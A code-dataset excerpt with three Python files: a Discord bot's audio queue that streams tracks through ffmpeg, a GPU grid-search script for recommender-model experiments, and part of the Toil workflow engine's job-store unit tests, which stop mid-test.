source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
audio.py
|
"""Audio queue management."""
import asyncio
import atexit
import collections
import copy
import discord
import enum
import json
import os
import queue
import subprocess
import threading
import time
import uuid
from typing import cast, Any, Awaitable, Callable, Deque, List, Optional
import uita.exceptions
import uita.youtube_api
import logging
log = logging.getLogger(__name__)
class Track():
"""Container for audio resource metadata.
Args:
path: Path to audio resource for ffmpeg to load.
user: User that requested track.
title: Title of track.
duration: Track duration in seconds.
live: Determines if the track is a remote livestream.
local: Determines if the track is a local file or not.
url: The public URL of the track if it exists, ``None`` otherwise.
Attributes:
id (str): Unique 32 character long ID.
path (str): Path to audio resource for ffmpeg to load.
user (uita.types.DiscordUser): User that requested track.
title (str): Title of track.
duration (int): Track duration in seconds.
live (bool): Determines if the track is a remote livestream.
local (bool): Determines if the track is a local file or not.
url (typing.Optional[str]): The public URL of the track if it exists, ``None`` otherwise.
offset (float): Offset in seconds to start track from.
"""
def __init__(
self,
path: str,
user: "uita.types.DiscordUser",
title: str,
duration: float,
live: bool,
local: bool,
url: Optional[str] = None
):
self.id = uuid.uuid4().hex
self.path = path
self.user = user
self.title = title
self.duration = float(duration)
self.live = live
self.local = local
self.url = url
self.offset: float = 0.0
# NOTE: These values must be synced with the enum used in utils/Message.js:PlayStatusSendMessage
class Status(enum.IntEnum):
"""Play status for audio."""
PLAYING = 1
PAUSED = 2
class Queue():
"""Queues audio resources to be played by a looping task.
Args:
maxlen: Maximum queue size. Default is ``None``, which is unlimited.
on_queue_change: Callback that is triggered everytime the state of the playback queue
changes. Function accepts a list of :class:`~uita.audio.Track` as its only argument.
on_status_change: Callback that is triggered everytime the playback status changes.
Function accepts a :class:`~uita.audio.Status` as its only argument.
loop: Event loop for audio tasks to run in.
Attributes:
loop (asyncio.AbstractEventLoop): Event loop for audio tasks to run in.
status (uita.audio.Status): Current playback status (playing, paused, etc).
"""
QueueCallbackType = Callable[
[List[Track], Optional["uita.types.DiscordUser"]], Awaitable[None]
]
StatusCallbackType = Callable[[Status], None]
def __init__(
self,
maxlen: Optional[int] = None,
on_queue_change: Optional[QueueCallbackType] = None,
on_status_change: Optional[StatusCallbackType] = None,
loop: Optional[asyncio.AbstractEventLoop] = None
) -> None:
# async lambdas don't exist
async def dummy_queue_change(q: Any, u: Any) -> None: pass
self._on_queue_change = on_queue_change or dummy_queue_change
async def dummy_status_change(s: Any) -> None: pass
self._on_status_change = on_status_change or dummy_status_change
self.loop = loop or asyncio.get_event_loop()
self.status = Status.PAUSED
self._now_playing: Optional[Track] = None
self._queue: Deque[Track] = collections.deque()
self._queue_lock = asyncio.Lock(loop=self.loop)
self._queue_update_flag = asyncio.Event(loop=self.loop)
self._queue_maxlen = maxlen
self._play_task: Optional[asyncio.Task[Any]] = None
self._play_start_time: Optional[float] = None
self._stream: Optional[FfmpegStream] = None
self._voice: Optional[discord.VoiceClient] = None
def queue(self) -> List[Track]:
"""Retrieves a list of currently queued audio resources.
Returns:
Ordered list of audio resources queued for playback.
"""
if self._now_playing is not None:
# To maintain timer precision we want to avoid modifying the current tracks offset
# outside of pause/resumes
now_playing = copy.copy(self._now_playing)
if self._play_start_time is not None:
now_playing.offset += max(
time.perf_counter() - self._play_start_time,
0.0
)
return [now_playing] + list(self._queue)
return list(self._queue)
def queue_full(self) -> bool:
"""Tests if the queue is at capacity.
Returns:
True if the queue is full.
"""
return self._queue_maxlen is not None and len(self.queue()) >= self._queue_maxlen
async def play(self, voice: discord.VoiceClient) -> None:
"""Starts a new playlist task that awaits and plays new queue inputs.
First stops current playlist task if it exists.
Args:
voice: Voice connection to spawn audio players for.
"""
# Cancels currently running play task
await self.stop()
self._play_task = self.loop.create_task(self._play_loop(voice))
async def stop(self) -> None:
"""Stops and currently playing audio and cancels the running play task."""
if self._play_task is not None:
# If we stop during a song, add it to the front of the queue to be resumed later
if self._now_playing is not None:
if self._play_start_time is not None:
# Add the time spent playing this track to the starting offset, so it resumes
# where it left off
self._now_playing.offset += max(
time.perf_counter() - self._play_start_time,
0.0
)
self._play_start_time = None
self._queue.appendleft(self._now_playing)
self._now_playing = None
self._play_task.cancel()
await self._play_task
self._end_stream()
async def enqueue_file(self, path: str, user: "uita.types.DiscordUser") -> None:
"""Queues a file to be played by the running playlist task.
Args:
path: Path for audio resource to be played.
user: User that requested track.
Raises:
uita.exceptions.ClientError: If called with an unusable audio path.
"""
# Some quick sanitization to make sure bad input won't escape the cache directory
# However user input should never reach this function
filename = os.path.join(uita.utils.cache_dir(), os.path.basename(path))
if not os.path.isfile(filename):
raise uita.exceptions.ClientError(
uita.message.ErrorFileInvalidMessage("Invalid audio format")
)
completed_probe_process = await self.loop.run_in_executor(
None,
lambda: subprocess.run([
"ffprobe",
filename,
"-of", "json",
"-show_format",
"-show_streams",
"-select_streams", "a",
"-show_error",
"-loglevel", "quiet"
], stdout=subprocess.PIPE)
)
probe = json.loads(completed_probe_process.stdout.decode("utf-8"))
if "format" not in probe:
raise uita.exceptions.ClientError(
uita.message.ErrorFileInvalidMessage("Invalid audio format")
)
if "streams" not in probe or len(probe["streams"]) == 0:
raise uita.exceptions.ClientError(
uita.message.ErrorFileInvalidMessage("No audio track found")
)
title = "untagged file upload"
if "tags" in probe["format"]:
# ffprobe sometimes keys tags in all caps or not
tags = {k.lower(): v for k, v in probe["format"]["tags"].items()}
title = "{} - {}".format(
tags.get("artist", "Unknown artist"),
tags.get("title", "Unknown title")
)
log.info(f"[{user.name}:{user.id}] Enqueue [Local]{title}, {probe['format']['duration']}s")
# This check cannot have any awaits between it and the following queue.append()s
if self.queue_full():
raise uita.exceptions.ClientError(uita.message.ErrorQueueFullMessage())
self._queue.append(Track(
filename,
user,
title,
float(probe["format"]["duration"]),
live=False,
local=True
))
await self._notify_queue_change(user)
async def enqueue_url(self, url: str, user: "uita.types.DiscordUser") -> None:
"""Queues a URL to be played by the running playlist task.
Args:
url: URL for audio resource to be played.
user: User that requested track.
Raises:
uita.exceptions.ClientError: If called with an unusable audio path.
"""
info = await uita.youtube_api.scrape(url, loop=self.loop)
# This check cannot have any awaits between it and the following queue.append()s
if self.queue_full():
raise uita.exceptions.ClientError(uita.message.ErrorQueueFullMessage())
if info["extractor"] == "Youtube":
log.info(f"[{user.name}:{user.id}] Enqueue [YouTube]{info['title']}({info['id']}) "
f"{info['acodec']}@{info['abr']}abr, {info['duration']}s")
self._queue.append(Track(
info["url"],
user,
info["title"],
float(info["duration"]),
info["is_live"] or False, # is_live is either True or None?? Thanks ytdl
local=False,
url=f"https://youtube.com/watch?v={info['id']}"
))
await self._notify_queue_change(user)
elif info["extractor"] == "YoutubePlaylist":
if info["_type"] != "playlist":
raise uita.exceptions.ServerError("Unknown playlist type")
for entry in info["entries"]:
await self.enqueue_url(f"https://youtube.com/watch?v={entry['id']}", user)
else:
raise uita.exceptions.ClientError(uita.message.ErrorUrlInvalidMessage())
async def move(self, track_id: str, position: int) -> None:
"""Moves a track to a new position in the playback queue.
Args:
track_id: Track ID of audio resource to be moved.
position: Index position for the track to be moved to.
"""
async with self._queue_lock:
if position >= len(self.queue()) or position < 0:
log.debug("Requested queue index out of bounds")
return
# Check if re-ordering the queue will change the currently playing song
if self._now_playing is not None and self._voice is not None:
# No need to swap with self while playing, would restart the track
if self._now_playing.id == track_id and position == 0:
return
if self._now_playing.id == track_id or position == 0:
self._now_playing.offset = 0
self._queue.appendleft(self._now_playing)
self._now_playing = None
self._voice.stop()
# Since now_playing will not be added to the queue, offset the index to compensate
else:
position -= 1
for index, track in enumerate(self._queue):
if track.id == track_id:
del self._queue[index]
self._queue.insert(position, track)
await self._notify_queue_change()
return
async def remove(self, track_id: str) -> None:
"""Removes a track from the playback queue.
Args:
track_id: Track ID of audio resource to be removed.
"""
async with self._queue_lock:
if self._now_playing is not None and self._now_playing.id == track_id:
if self._voice is not None:
self._voice.stop()
return
for track in self._queue:
if track.id == track_id:
self._queue.remove(track)
await self._notify_queue_change()
return
async def _after_song(self) -> None:
async with self._queue_lock:
self._now_playing = None
self._change_status(Status.PAUSED)
await self._notify_queue_change()
self._end_stream()
def _change_status(self, status: Status) -> None:
self.status = status
self._on_status_change(self.status)
async def _play_loop(self, voice: discord.VoiceClient) -> None:
try:
while voice.is_connected():
self._queue_update_flag.clear()
async with self._queue_lock:
if self._voice is None and len(self._queue) > 0:
self._now_playing = self._queue.popleft()
log.info(f"[{self._now_playing.user.name}:{self._now_playing.user.id}] "
f"Now playing {self._now_playing.title}")
# Launch ffmpeg process
self._stream = FfmpegStream(
self._now_playing,
discord.opus.Encoder()
)
self._voice = voice
# Waits until ffmpeg has buffered audio before playing
await self._stream.wait_ready(loop=self.loop)
# Wait an extra second for livestreams so player clock runs behind input
if self._now_playing.live is True:
await asyncio.sleep(1, loop=self.loop)
# Sync play start time to player start
self._play_start_time = time.perf_counter()
self._voice.play(
# About the same as a max volume YouTube video, I think
discord.PCMVolumeTransformer(self._stream, volume=0.3),
after=lambda err: asyncio.run_coroutine_threadsafe(
self._after_song(),
loop=self.loop
)
)
self._change_status(Status.PLAYING)
await self._queue_update_flag.wait()
except asyncio.CancelledError:
pass
except Exception as e:
log.error(f"Unhandled exception: {e}")
async def _notify_queue_change(self, user: Optional["uita.types.DiscordUser"] = None) -> None:
self._queue_update_flag.set()
await self._on_queue_change(self.queue(), user)
def _end_stream(self) -> None:
if self._stream is not None:
self._stream.stop()
self._stream = None
if self._voice is not None:
self._voice.stop()
self._voice = None
class FfmpegStream(discord.AudioSource):
"""Provides a data stream interface from an ffmpeg process for a ``discord.StreamPlayer``
Compared to the ffmpeg stream player provided by ``discord.FFmpegPCMAudio``,
this implementation will attempt to pre-fetch and cache (buffer) a sizable amount of audio
data in a concurrently running thread to minimize any hiccups while fetching audio data for
the consumer thread. This noticably cuts down on stuttering during playback, especially for
live streams.
Args:
track: Track to be played.
encoder: Opus encoder is needed to configure sampling rate for FFmpeg.
"""
def __init__(self, track: Track, encoder: discord.opus.Encoder) -> None:
self._track = track
self._encoder = encoder
process_options = [
"ffmpeg"
]
# The argument order is very important
if not self._track.local:
process_options += [
"-reconnect", "1",
"-reconnect_streamed", "1",
"-reconnect_delay_max", "10"
]
process_options += [
"-ss", str(track.offset if not track.live else 0.0),
"-i", track.path,
"-f", "s16le",
"-ac", str(self._encoder.CHANNELS),
"-ar", str(self._encoder.SAMPLING_RATE),
"-acodec", "pcm_s16le",
"-vn",
"-loglevel", "quiet",
"pipe:1"
]
self._process = subprocess.Popen(process_options, stdout=subprocess.PIPE)
# Ensure ffmpeg processes are cleaned up at exit, since Python handles this horribly
atexit.register(self.stop)
# Expecting a frame size of 3840 currently, queue should max out at 3.5MB~ of memory
self._buffer: queue.Queue[bytes] = queue.Queue(maxsize=1000)
# Run audio production and consumption in separate threads, buffering as much as possible
# This cuts down on audio dropping out during playback (especially for livestreams)
self._buffer_thread = threading.Thread(target=self._buffer_audio_packets)
# Causes thread to force exit on shutdown without cleaning up resources
# Python is really pretty bad for concurrency, maybe they intend for you to use events to
# trigger resource cleanup except this totally defeats the purpose of being able to use
# blocking calls in threads which is exactly how most of these threadable data structures
# are meant to be used!! It's very poorly designed!!!
self._buffer_thread.daemon = True
self._buffer_thread.start()
# Set once queue has buffered audio data available
self._is_ready = threading.Event()
def read(self) -> bytes:
"""Returns an array of raw audio data.
Returns:
Array of raw audio data. Size of array is equal to (or less than if EOF has been
reached) the ``FRAME_SIZE`` of the opus Encoder parameter passed into the object
constructor.
"""
try:
return self._buffer.get(timeout=10)
except queue.Empty:
log.warning("Audio process queue is not being produced")
self.stop()
# Empty read indicates completion
return b""
def is_opus(self) -> bool:
"""Produces raw PCM audio data."""
return False
def cleanup(self) -> None:
"""Cleanup is handled outside the discord.py API."""
pass
def stop(self) -> None:
"""Stops any currently running processes."""
try:
# We don't need to kill the thread here since it auto terminates after 10 seconds
# without buffer consumption
self._process.kill()
except Exception:
# subprocess.kill() can throw if the process has already ended...
# But I forget what type of exception it is and it's seemingly undocumented
pass
finally:
self._is_ready.set()
atexit.unregister(self.stop)
async def wait_ready(self, loop: Optional[asyncio.AbstractEventLoop] = None) -> None:
"""Waits until the first packet of buffered audio data is available to be read.
Args:
loop: Event loop to launch threaded blocking wait task from.
"""
async_loop = loop or asyncio.get_event_loop()
await async_loop.run_in_executor(None, lambda: self._is_ready.wait())
def _buffer_audio_packets(self) -> None:
need_set_ready = True
# Read from process stdout until an empty byte string is returned
def read() -> bytes:
return cast(bytes, self._process.stdout.read(self._encoder.FRAME_SIZE))
for data in iter(read, b""):
try:
# If the buffer fills and times out it means the queue is no longer being
# consumed, this likely means we're running in a zombie thread and should
# terminate. Ideally Python would let you send cancellation exceptions
# to child threads, much like how asyncio works, but hey who cares about
# consistency? Just let the timeout clean up our old resources instead...
# However! Since we use daemon threads, this method would just leave dangling
# ffmpeg processes on exit, and so we must register every spawned process to be
# cleaned up on exit. Python is really pretty terrible for concurrency. Chears.
if len(data) != self._encoder.FRAME_SIZE:
break
self._buffer.put(data, timeout=10)
if need_set_ready is True:
self._is_ready.set()
need_set_ready = False
except queue.Full:
self.stop()
return
try:
# self.read returning an empty byte string indicates EOF
self._buffer.put(b"", timeout=5)
except queue.Full:
pass
finally:
self.stop()
|
grid_search.py
|
import os
import gc
import copy
import time
import json
import datetime
import traceback
from tqdm import tqdm
import multiprocessing
from main import main
from utils import get_common_path
from data_path_constants import get_index_path, get_log_file_path
# NOTE: Specify all possible combinations of hyper-parameters you want to search on.
# NOTE: A list of values for a hyper-parameter means that you want to train all possible combinations of them
hyper_params = {
'dataset': [
'magazine',
# 'ml-100k',
],
'task': [
'explicit',
'implicit',
'sequential',
],
'sampling': [
'complete_data',
'user_rns',
'interaction_rns',
'freq_user_rns',
'temporal',
'tail_user_remove',
'svp_bias_only',
'svp_MF_dot',
'pagerank',
'random_walk',
'forest_fire',
],
'sampling_svp': [
'forgetting_events',
'forgetting_events_propensity',
'forgetting_events_user',
'forgetting_events_user_propensity',
],
'sampling_percent': [ 20, 40, 60, 80, 90, 99 ],
'latent_size': [ 8, 16, 32, 50 ], # Latent size in all algos
'lr': 0.006, # LR for ADAM # 0.01 for ml-100k ; 0.003 for ml-25m
'dropout': [ 0.3 ], # 0.3/4 works good for 0-core, 0.6/8 for 5-core
'model_type': [
'pop_rec',
'bias_only',
'MF_dot',
'NeuMF',
'MVAE',
'SVAE',
'SASRec',
],
'num_heads': 1, ## SASRec
'num_blocks': 2, ## SASRec
'num_next': [ 2 ], ## SVAE
'num_train_negs': 1,
'num_test_negs': 100,
#### Below hyper-params will be re-set from `data_hyperparams`
#### But adding just because we need them to compute common path
#### while counting the number of unique tasks
'weight_decay': float(1e-6),
}
# NOTE: Entering multiple of the same GPU-ID will launch multiple runs on the SAME GPU
# NOTE: Entering -1 or an invalid GPU-ID will run a corresponding run on the CPU
gpu_ids = [ 0, 0, 1, 1 ]
################## CONFIGURATION INPUT ENDS ###################
# STEP-1: Count processes
def get_all_jobs(task):
ret, single_proc = [], True
for key in task:
if type(task[key]) != list: continue
single_proc = False
for val in task[key]:
send = copy.deepcopy(task) ; send[key] = val
ret += get_all_jobs(send)
break # All sub-jobs are already counted
return ret if not single_proc else [ task ]
duplicate_tasks = get_all_jobs(hyper_params)
print("Total processes before unique:", len(duplicate_tasks))
def enough_users_items(task):
data_stats_file = get_index_path(task) + "data_stats.json"
with open(data_stats_file) as f: stats = json.load(f)
return stats['num_users'] >= 50 and stats['num_items'] >= 50 and stats['num_train_interactions'] >= 100
temp = set()
covered_tasks, all_tasks = set(), []
for task in tqdm(duplicate_tasks):
log_file = get_common_path(task)
if log_file is None: continue
if log_file in covered_tasks: continue
if not enough_users_items(task): continue
temp.add(log_file)
##### TEMP: Checking if job has already been done
if os.path.exists(get_log_file_path(task)):
f = open(get_log_file_path(task), 'r')
lines = f.readlines() ; f.close()
exists = sum(map(lambda x: int('TEST' in x.strip()), lines))
if exists != 0: continue
all_tasks.append(task)
covered_tasks.add(log_file)
print("Total processes after unique:", len(temp))
print("Total processes after removing already finished jobs:", len(all_tasks))
print(set(list(map(lambda x: x['model_type'], all_tasks))))
# exit()
# STEP-2: Assign individual GPU processes
gpu_jobs = [ [] for _ in range(len(gpu_ids)) ]
for i, task in enumerate(all_tasks): gpu_jobs[i % len(gpu_ids)].append(task)
# Step-3: Spawn jobs parallely
def file_write(log_file, s):
f = open(log_file, 'a')
f.write(s+'\n')
f.close()
def run_tasks(hyper_params, tasks, gpu_id):
start_time = time.time()
for num, task in enumerate(tasks):
percent_done = max(0.00001, float(num) / float(len(tasks)))
time_elapsed = time.time() - start_time
file_write(
"experiments/grid_search_log.txt",
str(task) + "\nGPU_ID = " + str(gpu_id) + "; dataset = " + task['dataset'] + "; [{} / {}] ".format(num, len(tasks)) +
str(round(100.0 * percent_done, 2)) + "% done; " +
"ETA = " + str(datetime.timedelta(seconds=int((time_elapsed / percent_done) - time_elapsed)))
)
try: main(task, gpu_id = gpu_id)
except Exception as e:
file_write(
"experiments/grid_search_log.txt", "GPU_ID = " + str(gpu_id) + \
"; ERROR [" + str(num) + "/" + str(len(tasks)) + "]\nJOB: " + str(task) + "\n" + str(traceback.format_exc())
)
gc.collect()
for gpu in range(len(gpu_ids)):
p = multiprocessing.Process(target=run_tasks, args=(hyper_params, gpu_jobs[gpu], gpu_ids[gpu], ))
p.start()
|
jobStoreTest.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import range
from builtins import str
from past.utils import old_div
from builtins import object
import socketserver
import pytest
import hashlib
import logging
import threading
import os
import sys
import shutil
import tempfile
import time
import uuid
from stubserver import FTPStubServer
from abc import abstractmethod, ABCMeta
from itertools import chain, islice
from threading import Thread
from six.moves.queue import Queue
from six.moves import SimpleHTTPServer, StringIO
from six import iteritems
import six.moves.urllib.parse as urlparse
from six.moves.urllib.request import urlopen, Request
from toil.lib.memoize import memoize
from toil.lib.exceptions import panic
# noinspection PyPackageRequirements
# (installed by `make prepare`)
from toil.common import Config, Toil
from toil.fileStores import FileID
from toil.job import Job, JobDescription, TemporaryID
from toil.jobStores.abstractJobStore import (NoSuchJobException,
NoSuchFileException)
from toil.jobStores.fileJobStore import FileJobStore
from toil.statsAndLogging import StatsAndLogging
from toil.test import (ToilTest,
needs_aws_s3,
needs_encryption,
make_tests,
needs_google,
travis_test,
slow)
from future.utils import with_metaclass
# Need googleRetry decorator even if google is not available, so make one up.
# Unconventional use of decorator to determine if google is enabled by seeing if
# it returns the parameter passed in.
if needs_google(needs_google) is needs_google:
from toil.jobStores.googleJobStore import googleRetry
else:
def googleRetry(x):
return x
logger = logging.getLogger(__name__)
def tearDownModule():
AbstractJobStoreTest.Test.cleanUpExternalStores()
class AbstractJobStoreTest(object):
"""
Hide abstract base class from unittest's test case loader
http://stackoverflow.com/questions/1323455/python-unit-test-with-base-and-sub-class#answer-25695512
"""
class Test(with_metaclass(ABCMeta, ToilTest)):
@classmethod
def setUpClass(cls):
super(AbstractJobStoreTest.Test, cls).setUpClass()
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('boto').setLevel(logging.CRITICAL)
# The use of @memoize ensures that we only have one instance of per class even with the
# generative import/export tests attempts to instantiate more. This in turn enables us to
# share the external stores (buckets, blob store containers, local directory, etc.) used
# for testing import export. While the constructor arguments are included in the
# memoization key, I have only ever seen one case: ('test', ). The worst that can happen
# if other values are also used is that there will be more external stores and less sharing
# of them. They will still all be cleaned-up.
@classmethod
@memoize
def __new__(cls, *args):
return super(AbstractJobStoreTest.Test, cls).__new__(cls)
def _createConfig(self):
return Config()
@abstractmethod
def _createJobStore(self):
"""
:rtype: AbstractJobStore
"""
raise NotImplementedError()
def setUp(self):
super(AbstractJobStoreTest.Test, self).setUp()
self.namePrefix = 'jobstore-test-' + str(uuid.uuid4())
self.config = self._createConfig()
# Jobstores to be used in testing.
# jobstore_initialized is created with a particular configuration, as creating by self._createConfig()
# jobstore_resume_noconfig is created with the resume() method. resume() will look for a previously
# instantiated jobstore, and initialize the jobstore calling it with the found config. In this case,
# jobstore_resume_noconfig will be initialized with the config from jobstore_initialized.
self.jobstore_initialized = self._createJobStore()
self.jobstore_initialized.initialize(self.config)
self.jobstore_resumed_noconfig = self._createJobStore()
self.jobstore_resumed_noconfig.resume()
# Requirements for jobs to be created.
self.arbitraryRequirements = {'memory': 1, 'disk': 2, 'cores': 1, 'preemptable': False}
# Function to make an arbitrary new job
self.arbitraryJob = lambda: JobDescription(command='command',
jobName='arbitrary',
requirements=self.arbitraryRequirements)
self.parentJobReqs = dict(memory=12, cores=34, disk=35, preemptable=True)
self.childJobReqs1 = dict(memory=23, cores=45, disk=46, preemptable=True)
self.childJobReqs2 = dict(memory=34, cores=56, disk=57, preemptable=False)
def tearDown(self):
self.jobstore_initialized.destroy()
self.jobstore_resumed_noconfig.destroy()
super(AbstractJobStoreTest.Test, self).tearDown()
@travis_test
def testInitialState(self):
"""Ensure proper handling of nonexistant files."""
self.assertFalse(self.jobstore_initialized.exists('nonexistantFile'))
self.assertRaises(NoSuchJobException, self.jobstore_initialized.load, 'nonexistantFile')
@travis_test
def testJobCreation(self):
"""
Test creation of a job.
Does the job exist in the jobstore it is supposed to be in?
Are its attributes what is expected?
"""
jobstore = self.jobstore_initialized
# Create a job and verify its existence/properties
job = JobDescription(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent')
self.assertTrue(isinstance(job.jobStoreID, TemporaryID))
jobstore.assignID(job)
self.assertFalse(isinstance(job.jobStoreID, TemporaryID))
created = jobstore.create(job)
self.assertEqual(created, job)
self.assertTrue(jobstore.exists(job.jobStoreID))
self.assertEqual(job.command, 'parent1')
self.assertEqual(job.memory, self.parentJobReqs['memory'])
self.assertEqual(job.cores, self.parentJobReqs['cores'])
self.assertEqual(job.disk, self.parentJobReqs['disk'])
self.assertEqual(job.preemptable, self.parentJobReqs['preemptable'])
self.assertEqual(job.jobName, 'test1')
self.assertEqual(job.unitName, 'onParent')
@travis_test
def testConfigEquality(self):
"""
Ensure that the command line configurations are successfully loaded and stored.
In setUp() self.jobstore1 is created and initialized. In this test, after creating newJobStore,
.resume() will look for a previously instantiated job store and load its config options. This is expected
to be equal but not the same object.
"""
newJobStore = self._createJobStore()
newJobStore.resume()
self.assertEqual(newJobStore.config, self.config)
self.assertIsNot(newJobStore.config, self.config)
@travis_test
def testJobLoadEquality(self):
"""Tests that a job created via one JobStore instance can be loaded from another."""
# Create a job on the first jobstore.
jobDesc1 = JobDescription(command='jobstore1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJS1')
self.jobstore_initialized.assignID(jobDesc1)
self.jobstore_initialized.create(jobDesc1)
# Load it from the second jobstore
jobDesc2 = self.jobstore_resumed_noconfig.load(jobDesc1.jobStoreID)
self.assertEqual(jobDesc1.command, jobDesc2.command)
@travis_test
def testChildLoadingEquality(self):
"""Test that loading a child job operates as expected."""
job = JobDescription(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent')
childJob = JobDescription(command='child1',
requirements=self.childJobReqs1,
jobName='test2', unitName='onChild1')
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.assignID(childJob)
self.jobstore_initialized.create(job)
self.jobstore_initialized.create(childJob)
job.addChild(childJob.jobStoreID)
self.jobstore_initialized.update(job)
self.assertEqual(self.jobstore_initialized.load(list(job.allSuccessors())[0]).command, childJob.command)
@travis_test
def testPersistantFilesToDelete(self):
"""
Make sure that updating a job carries over filesToDelete.
The following demonstrates the job update pattern, where files to be deleted are referenced in
"filesToDelete" array, which is persisted to disk first. If things go wrong during the update, this list of
files to delete is used to remove the unneeded files.
"""
# Create a job.
job = JobDescription(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJS1')
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
job.filesToDelete = ['1', '2']
self.jobstore_initialized.update(job)
self.assertEqual(self.jobstore_initialized.load(job.jobStoreID).filesToDelete, ['1', '2'])
@travis_test
def testUpdateBehavior(self):
"""Tests the proper behavior during updating jobs."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
job1 = JobDescription(command='parent1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onParent')
childJob1 = JobDescription(command='child1',
requirements=self.childJobReqs1,
jobName='test2', unitName='onChild1')
childJob2 = JobDescription(command='child2',
requirements=self.childJobReqs2,
jobName='test3', unitName='onChild2')
jobstore1.assignID(job1)
jobstore1.create(job1)
job2 = jobstore2.load(job1.jobStoreID)
# Create child jobs.
jobstore2.assignID(childJob1)
jobstore2.create(childJob1)
jobstore2.assignID(childJob2)
jobstore2.create(childJob2)
# Add them to job2.
job2.addChild(childJob1.jobStoreID)
job2.addChild(childJob2.jobStoreID)
jobstore2.update(job2)
# Check equivalence between jobstore1 and jobstore2.
# While job1 and job2 share a jobStoreID, job1 has not been "refreshed" to show the newly added child jobs.
self.assertNotEqual([sorted(x) for x in job2.stack], [sorted(x) for x in job1.stack])
# Reload parent job on jobstore, "refreshing" the job.
job1 = jobstore1.load(job1.jobStoreID)
self.assertEqual([sorted(x) for x in job2.stack], [sorted(x) for x in job1.stack])
# Jobs still shouldn't *actually* be equal, even if their contents are the same.
self.assertNotEqual(job2, job1)
# Load children on jobstore and check against equivalence
self.assertNotEqual(jobstore1.load(childJob1.jobStoreID), childJob1)
self.assertNotEqual(jobstore1.load(childJob2.jobStoreID), childJob2)
@travis_test
def testJobDeletions(self):
"""Tests the consequences of deleting jobs."""
# A local jobstore object for testing.
jobstore = self.jobstore_initialized
job = JobDescription(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJob')
# Create job
jobstore.assignID(job)
jobstore.create(job)
# Create child Jobs
child1 = JobDescription(command='child1',
requirements=self.childJobReqs1,
jobName='test2', unitName='onChild1')
child2 = JobDescription(command='job1',
requirements=self.childJobReqs2,
jobName='test3', unitName='onChild2')
# Add children to parent.
jobstore.assignID(child1)
jobstore.create(child1)
jobstore.assignID(child2)
jobstore.create(child2)
job.addChild(child1.jobStoreID)
job.addChild(child2.jobStoreID)
jobstore.update(job)
# Get it ready to run children
job.command = None
jobstore.update(job)
# Go get the children
childJobs = [jobstore.load(childID) for childID in job.nextSuccessors()]
# Test job iterator - the results of the iterator are effected by eventual
# consistency. We cannot guarantee all jobs will appear but we can assert that all
# jobs that show up are a subset of all existing jobs. If we had deleted jobs before
# this we would have to worry about ghost jobs appearing and this assertion would not
# be valid
self.assertTrue(set((j.jobStoreID for j in (childJobs + [job]))) >= set((j.jobStoreID for j in jobstore.jobs())))
# Test job deletions
# First delete parent, this should have no effect on the children
self.assertTrue(jobstore.exists(job.jobStoreID))
jobstore.delete(job.jobStoreID)
self.assertFalse(jobstore.exists(job.jobStoreID))
# Check the deletion of children
for childJob in childJobs:
self.assertTrue(jobstore.exists(childJob.jobStoreID))
jobstore.delete(childJob.jobStoreID)
self.assertFalse(jobstore.exists(childJob.jobStoreID))
self.assertRaises(NoSuchJobException, jobstore.load, childJob.jobStoreID)
try:
with jobstore.readSharedFileStream('missing') as _:
pass
self.fail('Expecting NoSuchFileException')
except NoSuchFileException:
pass
@travis_test
def testSharedFiles(self):
"""Tests the sharing of files."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
bar = 'bar'
if sys.version_info >= (3, 0):
bar = b'bar'
with jobstore1.writeSharedFileStream('foo') as f:
f.write(bar)
# ... read that file on worker, ...
with jobstore2.readSharedFileStream('foo') as f:
self.assertEqual(bar, f.read())
# ... and read it again on jobstore1.
with jobstore1.readSharedFileStream('foo') as f:
self.assertEqual(bar, f.read())
with jobstore1.writeSharedFileStream('nonEncrypted', isProtected=False) as f:
f.write(bar)
self.assertUrl(jobstore1.getSharedPublicUrl('nonEncrypted'))
self.assertRaises(NoSuchFileException, jobstore1.getSharedPublicUrl, 'missing')
@travis_test
def testPerJobFiles(self):
"""Tests the behavior of files on jobs."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
# Create jobNodeOnJS1
jobOnJobStore1 = JobDescription(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJobStore1')
# First recreate job
jobstore1.assignID(jobOnJobStore1)
jobstore1.create(jobOnJobStore1)
fileOne = jobstore2.getEmptyFileStoreID(jobOnJobStore1.jobStoreID, cleanup=True)
# Check file exists
self.assertTrue(jobstore2.fileExists(fileOne))
self.assertTrue(jobstore1.fileExists(fileOne))
one = 'one'
two = 'two'
three = 'three'
if sys.version_info >= (3, 0):
one = b'one'
two = b'two'
three = b'three'
# ... write to the file on jobstore2, ...
with jobstore2.updateFileStream(fileOne) as f:
f.write(one)
# ... read the file as a stream on the jobstore1, ....
with jobstore1.readFileStream(fileOne) as f:
self.assertEqual(f.read(), one)
# ... and copy it to a temporary physical file on the jobstore1.
fh, path = tempfile.mkstemp()
try:
os.close(fh)
tmpPath = path + '.read-only'
jobstore1.readFile(fileOne, tmpPath)
try:
shutil.copyfile(tmpPath, path)
finally:
os.unlink(tmpPath)
with open(path, 'rb+') as f:
self.assertEqual(f.read(), one)
# Write a different string to the local file ...
f.seek(0)
f.truncate(0)
f.write(two)
# ... and create a second file from the local file.
